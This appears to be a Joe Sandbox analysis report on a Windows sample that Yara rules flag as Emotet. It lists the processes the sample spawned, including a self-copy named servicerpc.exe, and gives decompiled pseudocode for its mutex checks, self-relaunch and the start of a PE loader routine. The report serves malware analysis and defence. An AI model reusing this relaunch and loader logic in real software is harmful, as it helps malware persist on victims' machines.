this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: 0HvIGwMmBV.exe PID: 2208 Parent PID: 5516

General

Start time:	23:30:40
Start date:	27/03/2021
Path:	C:\Users\user\Desktop\0HvIGwMmBV.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\0HvIGwMmBV.exe'
Imagebase:	0xe80000
File size:	45568 bytes
MD5 hash:	ECBC4B40DCFEC4ED1B2647B217DA0441
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.195788006.0000000000E81000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: 0HvIGwMmBV.exe PID: 2200 Parent PID: 2208

General

Start time:	23:30:40
Start date:	27/03/2021
Path:	C:\Users\user\Desktop\0HvIGwMmBV.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\0HvIGwMmBV.exe
Imagebase:	0xe80000
File size:	45568 bytes
MD5 hash:	ECBC4B40DCFEC4ED1B2647B217DA0441
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.204042221.0000000000E81000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000000.196655416.0000000000E81000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: servicerpc.exe PID: 2308 Parent PID: 568

General

Start time:	23:30:43
Start date:	27/03/2021
Path:	C:\Windows\SysWOW64\servicerpc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\servicerpc.exe
Imagebase:	0xe80000
File size:	45568 bytes
MD5 hash:	ECBC4B40DCFEC4ED1B2647B217DA0441
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.203686958.0000000000E81000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.202503920.0000000000E81000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: servicerpc.exe PID: 5340 Parent PID: 2308

General

Start time:	23:30:43
Start date:	27/03/2021
Path:	C:\Windows\SysWOW64\servicerpc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\servicerpc.exe
Imagebase:	0xe80000
File size:	45568 bytes
MD5 hash:	ECBC4B40DCFEC4ED1B2647B217DA0441
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.463934168.0000000000E81000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000000.203264019.0000000000E81000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 5276 Parent PID: 568

General

Start time:	23:31:09
Start date:	27/03/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7ca4e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6088 Parent PID: 568

General

Start time:	23:31:20
Start date:	27/03/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6080 Parent PID: 568

General

Start time:	23:31:21
Start date:	27/03/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 4972 Parent PID: 568

General

Start time:	23:31:21
Start date:	27/03/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k unistacksvcgroup
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6024 Parent PID: 568

General

Start time:	23:31:21
Start date:	27/03/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 2100 Parent PID: 568

General

Start time:	23:31:22
Start date:	27/03/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: SgrmBroker.exe PID: 6008 Parent PID: 568

General

Start time:	23:31:22
Start date:	27/03/2021
Path:	C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\SgrmBroker.exe
Imagebase:	0x7ff71c480000
File size:	163336 bytes
MD5 hash:	D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5976 Parent PID: 568

General

Start time:	23:31:23
Start date:	27/03/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: MpCmdRun.exe PID: 5496 Parent PID: 5976

General

Start time:	23:32:23
Start date:	27/03/2021
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Imagebase:	0x7ff632c10000
File size:	455656 bytes
MD5 hash:	A267555174BFA53844371226F482B86B
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 2000 Parent PID: 5496

General

Start time:	23:32:24
Start date:	27/03/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 0HvIGwMmBV.exe PID: 2208 Parent PID: 5516 0HvIGwMmBV.exeCOMMON

Execution Graph

Execution Coverage:	2.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	8.3%
Total number of Nodes:	531
Total number of Limit Nodes:	3

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00E89EE0, Relevance: 9.0, APIs: 6, Instructions: 40
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {
				void* _t6;
				void* _t11;
				void* _t18;

				E00E81B10(E00E81BE0(0xd22e2014), 0xe811f0, 9, 0x3966646c, 0xe8c1f0);
				E00E81B10(E00E81BE0(0x8f7ee672), 0xe810d0, 0x48, 0x6677a1d2, 0xe8c0d0);
				_t6 = RtlAllocateHeap(GetProcessHeap(), 0, 0x8000000); // executed
				_t18 = _t6;
				if(_t18 != 0) {
					memset(_t18, 0, 0x8000000);
					RtlFreeHeap(GetProcessHeap(), 0, _t18); // executed
					E00E815B0(_t11); // executed
				}
				ExitProcess(0);
			}

0x00e89efe
0x00e89f23
0x00e89f39
0x00e89f3f
0x00e89f43
0x00e89f4d
0x00e89f60
0x00e89f66
0x00e89f66
0x00e89f6d

APIs

GetProcessHeap.KERNEL32(00000000,08000000), ref: 00E89F32
RtlAllocateHeap.NTDLL(00000000), ref: 00E89F39
memset.NTDLL ref: 00E89F4D
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E89F59
RtlFreeHeap.NTDLL(00000000), ref: 00E89F60

Part of subcall function 00E815B0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 00E815C9
Part of subcall function 00E815B0: _snwprintf.NTDLL ref: 00E81602
Part of subcall function 00E815B0: GetProcessHeap.KERNEL32(00000000,00E89F6B), ref: 00E8160E
Part of subcall function 00E815B0: HeapFree.KERNEL32(00000000), ref: 00E81615
Part of subcall function 00E815B0: _snwprintf.NTDLL ref: 00E81641
Part of subcall function 00E815B0: GetProcessHeap.KERNEL32(00000000,00E89F6B), ref: 00E8164D
Part of subcall function 00E815B0: HeapFree.KERNEL32(00000000), ref: 00E81654
Part of subcall function 00E815B0: CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 00E81667
Part of subcall function 00E815B0: CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 00E8167E
Part of subcall function 00E815B0: CloseHandle.KERNEL32(00000000), ref: 00E8168B

ExitProcess.KERNEL32 ref: 00E89F6D

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Create_snwprintf$AllocateCloseEventExitFileHandleModuleMutexNamememset
String ID:
API String ID: 871367918-0
Opcode ID: 953791c7a9e2f8ca5768c83aa7a7c1691c41719520ce8166d18372fc21467936
Instruction ID: 2b18b3097f6b399eee42503a7ba0406f34e10a56eb49595d9169baa068810016
Opcode Fuzzy Hash: 953791c7a9e2f8ca5768c83aa7a7c1691c41719520ce8166d18372fc21467936
Instruction Fuzzy Hash: 29F06D30B86700AFF51033B56C2FB1A39695B82B86F206460B60EBA6D7EDB1480547B9

Uniqueness

Uniqueness Score: -1.00%

Function 00E815B0, Relevance: 38.6, APIs: 21, Strings: 1, Instructions: 133
memorysynchronizationprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E00E815B0(void* __ebx) {
				void* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				short _v220;
				short _v348;
				short _v868;
				intOrPtr* _t23;
				void* _t40;
				int _t47;
				WCHAR* _t61;
				void* _t64;
				void* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;

				GetModuleFileNameW(0,  &_v868, 0x104);
				_t61 =  &_v868;
				_t23 = E00E819E0(_t61);
				 *((intOrPtr*)(__ebx + 0x4baf8)) =  *((intOrPtr*)(__ebx + 0x4baf8)) + _t61;
				 *_t23 =  *_t23 + _t23;
				E00E81830(0xe81004, _t64, 0x4dbac13f,  &_v8);
				_t68 = _v8;
				 *0xe8c200( &_v348, 0x40, _t68, _t66);
				HeapFree(GetProcessHeap(), 0, _t68);
				E00E81830(0xe81000, 4, 0x4dbac13f,  &_v8);
				_t69 = _v8;
				 *0xe8c200( &_v220, 0x40, _t69, _t66);
				HeapFree(GetProcessHeap(), 0, _t69);
				_t70 = CreateEventW(0, 1, 0,  &_v348);
				if(_t70 == 0) {
					L4:
					return 0;
				} else {
					_t40 = CreateMutexW(0, 1,  &_v220); // executed
					_t67 = _t40;
					if(_t67 != 0) {
						if(GetLastError() != 0xb7) {
							memset( &_v92, 0, 0x44);
							_v92.cb = 0x44;
							_v92.dwFlags = 0x80;
							_t47 = CreateProcessW( &_v868, 0, 0, 0, 0, 0, 0, 0,  &_v92,  &_v24); // executed
							if(_t47 == 0) {
								goto L4;
							} else {
								WaitForSingleObject(_t70, 0xffffffff);
								CloseHandle(_v24);
								CloseHandle(_v24.hThread);
								CloseHandle(_t70);
								CloseHandle(_t67);
								return 1;
							}
						} else {
							SetEvent(_t70);
							CloseHandle(_t70);
							CloseHandle(_t67);
							E00E89C50(0xe81000);
							return 1;
						}
					} else {
						CloseHandle(_t70);
						goto L4;
					}
				}
			}

0x00e815c9
0x00e815cf
0x00e815d5
0x00e815d9
0x00e815df
0x00e815ef
0x00e815f4
0x00e81602
0x00e81615
0x00e8162e
0x00e81633
0x00e81641
0x00e81654
0x00e8166d
0x00e81671
0x00e81692
0x00e81698
0x00e81673
0x00e8167e
0x00e81684
0x00e81688
0x00e816a4
0x00e816d3
0x00e816dc
0x00e816e6
0x00e81707
0x00e8170f
0x00000000
0x00e81711
0x00e81714
0x00e8171d
0x00e81726
0x00e8172d
0x00e81734
0x00e81744
0x00e81744
0x00e816a6
0x00e816a7
0x00e816ae
0x00e816b5
0x00e816bb
0x00e816ca
0x00e816ca
0x00e8168a
0x00e8168b
0x00000000
0x00e8168b
0x00e81688

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 00E815C9

Part of subcall function 00E81830: GetProcessHeap.KERNEL32(00000008,00E89F6B,00000000,00000000,00E81004,?,00E815F4,4DBAC13F,00E89F6B,?,00000000), ref: 00E81844
Part of subcall function 00E81830: RtlAllocateHeap.NTDLL(00000000,?,00E815F4), ref: 00E8184B

_snwprintf.NTDLL ref: 00E81602
GetProcessHeap.KERNEL32(00000000,00E89F6B), ref: 00E8160E
HeapFree.KERNEL32(00000000), ref: 00E81615
_snwprintf.NTDLL ref: 00E81641
GetProcessHeap.KERNEL32(00000000,00E89F6B), ref: 00E8164D
HeapFree.KERNEL32(00000000), ref: 00E81654
CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 00E81667
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 00E8167E
CloseHandle.KERNEL32(00000000), ref: 00E8168B
GetLastError.KERNEL32 ref: 00E81699
SetEvent.KERNEL32(00000000), ref: 00E816A7
CloseHandle.KERNEL32(00000000), ref: 00E816AE
CloseHandle.KERNEL32(00000000), ref: 00E816B5
memset.NTDLL ref: 00E816D3
CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00E81707
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00E81714
CloseHandle.KERNEL32(?), ref: 00E8171D
CloseHandle.KERNEL32(?), ref: 00E81726
CloseHandle.KERNEL32(00000000), ref: 00E8172D
CloseHandle.KERNEL32(00000000), ref: 00E81734

Strings

D, xrefs: 00E816DC

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: CloseHandle$Heap$Process$Create$EventFree_snwprintf$AllocateErrorFileLastModuleMutexNameObjectSingleWaitmemset
String ID: D
API String ID: 2830143876-2746444292
Opcode ID: 5e7efcac2e4e0e909932bf655c523235974c394491d323743b27041ea8859126
Instruction ID: e470f2f013bd92c8cc056a420d35a1e0c435334e58a17d911e7d2627baf2782e
Opcode Fuzzy Hash: 5e7efcac2e4e0e909932bf655c523235974c394491d323743b27041ea8859126
Instruction Fuzzy Hash: 8D41C131901118AFEB10ABA5EC8DFEE7B7CEB46711F240091F60DF6191DB709A498BB5

Uniqueness

Uniqueness Score: -1.00%

Function 00E81599, Relevance: 15.1, APIs: 10, Instructions: 86
memorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00E81599(signed int __eax, void* __ebx, intOrPtr* __ecx, void* __edx, void* __esi, void* __fp0) {
				void* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				short _v220;
				short _v348;
				short _v868;
				short _v876;
				intOrPtr* _t27;
				void* _t44;
				int _t51;
				WCHAR* _t66;
				void* _t71;
				intOrPtr _t73;
				void* _t75;
				void* _t79;
				void* _t80;
				void* _t81;
				void* _t85;
				intOrPtr* _t90;

				asm("daa");
				_t71 = __edx -  *_t90;
				asm("salc");
				 *((intOrPtr*)(__esi + 2)) =  *((intOrPtr*)(__esi + 2)) + (__eax | 0x0000004a);
				_t73 =  *__ecx;
				GetModuleFileNameW(0,  &_v876, 0x104);
				_t66 =  &_v876;
				_t27 = E00E819E0(_t66);
				 *((intOrPtr*)(__ebx + 0x4baf8)) =  *((intOrPtr*)(__ebx + 0x4baf8)) + _t66;
				 *_t27 =  *_t27 + _t27;
				E00E81830(0xe81004, _t71, 0x4dbac13f,  &_v8);
				_t79 = _v8;
				 *0xe8c200( &_v348, 0x40, _t79, _t73, _t73, __esi, _t85, _t90, cs);
				HeapFree(GetProcessHeap(), 0, _t79);
				E00E81830(0xe81000, 4, 0x4dbac13f,  &_v8);
				_t80 = _v8;
				 *0xe8c200( &_v220, 0x40, _t80, _t73);
				HeapFree(GetProcessHeap(), 0, _t80);
				_t81 = CreateEventW(0, 1, 0,  &_v348);
				if(_t81 == 0) {
					L5:
					return 0;
				} else {
					_t44 = CreateMutexW(0, 1,  &_v220); // executed
					_t75 = _t44;
					if(_t75 != 0) {
						if(GetLastError() != 0xb7) {
							memset( &_v92, 0, 0x44);
							_v92.cb = 0x44;
							_v92.dwFlags = 0x80;
							_t51 = CreateProcessW( &_v868, 0, 0, 0, 0, 0, 0, 0,  &_v92,  &_v24); // executed
							if(_t51 == 0) {
								goto L5;
							} else {
								WaitForSingleObject(_t81, 0xffffffff);
								CloseHandle(_v24);
								CloseHandle(_v24.hThread);
								CloseHandle(_t81);
								CloseHandle(_t75);
								return 1;
							}
						} else {
							SetEvent(_t81);
							CloseHandle(_t81);
							CloseHandle(_t75);
							E00E89C50(0xe81000);
							return 1;
						}
					} else {
						CloseHandle(_t81);
						goto L5;
					}
				}
			}

0x00e81599
0x00e8159d
0x00e815a5
0x00e815a6
0x00e815a9
0x00e815c9
0x00e815cf
0x00e815d5
0x00e815d9
0x00e815df
0x00e815ef
0x00e815f4
0x00e81602
0x00e81615
0x00e8162e
0x00e81633
0x00e81641
0x00e81654
0x00e8166d
0x00e81671
0x00e81691
0x00e81698
0x00e81673
0x00e8167e
0x00e81684
0x00e81688
0x00e816a4
0x00e816d3
0x00e816dc
0x00e816e6
0x00e81707
0x00e8170f
0x00000000
0x00e81711
0x00e81714
0x00e8171d
0x00e81726
0x00e8172d
0x00e81734
0x00e81744
0x00e81744
0x00e816a6
0x00e816a7
0x00e816ae
0x00e816b5
0x00e816bb
0x00e816ca
0x00e816ca
0x00e8168a
0x00e8168b
0x00000000
0x00e8168b
0x00e81688

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 00E815C9

Part of subcall function 00E81830: GetProcessHeap.KERNEL32(00000008,00E89F6B,00000000,00000000,00E81004,?,00E815F4,4DBAC13F,00E89F6B,?,00000000), ref: 00E81844
Part of subcall function 00E81830: RtlAllocateHeap.NTDLL(00000000,?,00E815F4), ref: 00E8184B

_snwprintf.NTDLL ref: 00E81602
GetProcessHeap.KERNEL32(00000000,00E89F6B), ref: 00E8160E
HeapFree.KERNEL32(00000000), ref: 00E81615
_snwprintf.NTDLL ref: 00E81641
GetProcessHeap.KERNEL32(00000000,00E89F6B), ref: 00E8164D
HeapFree.KERNEL32(00000000), ref: 00E81654
CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 00E81667
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 00E8167E
CloseHandle.KERNEL32(00000000), ref: 00E8168B
GetLastError.KERNEL32 ref: 00E81699
SetEvent.KERNEL32(00000000), ref: 00E816A7
CloseHandle.KERNEL32(00000000), ref: 00E816AE
CloseHandle.KERNEL32(00000000), ref: 00E816B5

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: Heap$CloseHandleProcess$CreateEventFree_snwprintf$AllocateErrorFileLastModuleMutexName
String ID:
API String ID: 4183562332-0
Opcode ID: c8fc3c8b543b61c73631fc05c058f1850b23c8de4dd8e2c4800b382e210da245
Instruction ID: 395031004ba3100e5de0aff76e2369942c4b538d4b28b230e631648053b6b4e6
Opcode Fuzzy Hash: c8fc3c8b543b61c73631fc05c058f1850b23c8de4dd8e2c4800b382e210da245
Instruction Fuzzy Hash: 2F21D371641514BFEB20ABA1DC4EFDA3B7DEB81716F144091FA0CF7191DA309A498BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E81575, Relevance: 13.6, APIs: 9, Instructions: 73
memorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00E81575(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi, void* __fp0) {
				void* _v4;
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v88;
				short _v216;
				short _v344;
				short _v864;
				void* _v880;
				signed char _t34;
				void* _t51;
				int _t58;
				signed char _t71;
				signed char _t73;
				void* _t78;
				void* _t79;
				void* _t82;
				void* _t84;
				signed char _t87;
				void* _t89;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t105;
				void* _t127;

				L0:
				while(1) {
					_t84 = __edx;
					_t79 = __ecx;
					_t78 = __ebx;
					_t127 = __fp0 -  *[fs:edx];
					_t34 = __eax + 0x527dd026 | 0x0000004a;
					asm("fistp qword [ecx+ebx]");
					if(__ecx >= _t34) {
						break;
					}
					L14:
					_t127 = _t127 -  *[fs:edx];
					_t71 = _t73 | 0x0000004a;
					asm("retf");
					_t79 = _t82 - _t105;
					asm("daa");
					_push(__ebx);
					if (_t79 < 0) goto L5;
					L15:
					_t87 = _t71;
				}
				L19:
				 *((intOrPtr*)(_t78 + 0x4baf8)) =  *((intOrPtr*)(_t78 + 0x4baf8)) + _t79;
				 *_t34 =  *_t34 + _t34;
				E00E81830(0xe81004, _t84, 0x4dbac13f,  &_v4);
				_t95 = _v4;
				 *0xe8c200( &_v344, 0x40, _t95, _t89);
				HeapFree(GetProcessHeap(), 0, _t95);
				E00E81830(0xe81000, 4, 0x4dbac13f,  &_v4);
				_t96 = _v4;
				 *0xe8c200( &_v216, 0x40, _t96, _t89);
				HeapFree(GetProcessHeap(), 0, _t96);
				_t97 = CreateEventW(0, 1, 0,  &_v344);
				if(_t97 == 0) {
					L22:
					return 0;
				} else {
					_t51 = CreateMutexW(0, 1,  &_v216); // executed
					_t91 = _t51;
					if(_t91 != 0) {
						if(GetLastError() != 0xb7) {
							memset( &_v88, 0, 0x44);
							_v88.cb = 0x44;
							_v88.dwFlags = 0x80;
							_t58 = CreateProcessW( &_v864, 0, 0, 0, 0, 0, 0, 0,  &_v88,  &_v20); // executed
							if(_t58 == 0) {
								goto L22;
							} else {
								WaitForSingleObject(_t97, 0xffffffff);
								CloseHandle(_v20);
								CloseHandle(_v20.hThread);
								CloseHandle(_t97);
								CloseHandle(_t91);
								return 1;
							}
						} else {
							SetEvent(_t97);
							CloseHandle(_t97);
							CloseHandle(_t91);
							E00E89C50(0xe81000);
							return 1;
						}
					} else {
						CloseHandle(_t97);
						goto L22;
					}
				}
			}

0x00e81575
0x00e81575
0x00e81575
0x00e81575
0x00e81575
0x00e8157b
0x00e8157e
0x00e81580
0x00e81585
0x00000000
0x00000000
0x00e81587
0x00e81587
0x00e8158a
0x00e8158c
0x00e8158f
0x00e81591
0x00e81592
0x00e81593
0x00e81594
0x00e81594
0x00e81594
0x00e815d9
0x00e815d9
0x00e815df
0x00e815ef
0x00e815f4
0x00e81602
0x00e81615
0x00e8162e
0x00e81633
0x00e81641
0x00e81654
0x00e8166d
0x00e81671
0x00e81691
0x00e81698
0x00e81673
0x00e8167e
0x00e81684
0x00e81688
0x00e816a4
0x00e816d3
0x00e816dc
0x00e816e6
0x00e81707
0x00e8170f
0x00000000
0x00e81711
0x00e81714
0x00e8171d
0x00e81726
0x00e8172d
0x00e81734
0x00e81744
0x00e81744
0x00e816a6
0x00e816a7
0x00e816ae
0x00e816b5
0x00e816bb
0x00e816ca
0x00e816ca
0x00e8168a
0x00e8168b
0x00000000
0x00e8168b
0x00e81688

APIs

_snwprintf.NTDLL ref: 00E81602
GetProcessHeap.KERNEL32(00000000,00E89F6B), ref: 00E8160E
HeapFree.KERNEL32(00000000), ref: 00E81615
_snwprintf.NTDLL ref: 00E81641
GetProcessHeap.KERNEL32(00000000,00E89F6B), ref: 00E8164D
HeapFree.KERNEL32(00000000), ref: 00E81654
CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 00E81667
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 00E8167E
CloseHandle.KERNEL32(00000000), ref: 00E8168B

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcess_snwprintf$CloseEventHandleMutex
String ID:
API String ID: 2595929981-0
Opcode ID: 61a2ee2f8c51956ee126759a7111c09ff4b51678b3038c82fe2e79f5a0fb5c0a
Instruction ID: f265588ec714c1e90846d9bc2d4a04e3ef993698bca3d7b3046bf49e2dbd8e46
Opcode Fuzzy Hash: 61a2ee2f8c51956ee126759a7111c09ff4b51678b3038c82fe2e79f5a0fb5c0a
Instruction Fuzzy Hash: 5221D871505555AFEB21ABA29C4DFDA377CEF82715F1400D1FA0CFB291DA30894A8771

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00E81F40, Relevance: 9.2, APIs: 6, Instructions: 163
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E81F40(void* __ecx, void* __edx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				struct HINSTANCE__* _v20;
				intOrPtr _t55;
				struct HINSTANCE__* _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				signed short _t65;
				CHAR* _t68;
				_Unknown_base(*)()* _t69;
				intOrPtr* _t70;
				signed int _t71;
				void* _t79;
				intOrPtr _t81;
				struct HINSTANCE__* _t82;
				void* _t85;
				intOrPtr _t86;
				signed short* _t89;
				void* _t90;
				intOrPtr* _t91;
				_Unknown_base(*)()** _t93;
				void* _t96;
				intOrPtr* _t99;
				void* _t102;
				intOrPtr* _t104;
				signed short* _t106;
				void* _t108;
				void* _t109;
				signed short _t128;

				_t79 = 0;
				_t90 = __ecx;
				if(__edx <= 0x40 ||  *((intOrPtr*)(__ecx)) != 0x5a4d) {
					L33:
					return _t79;
				} else {
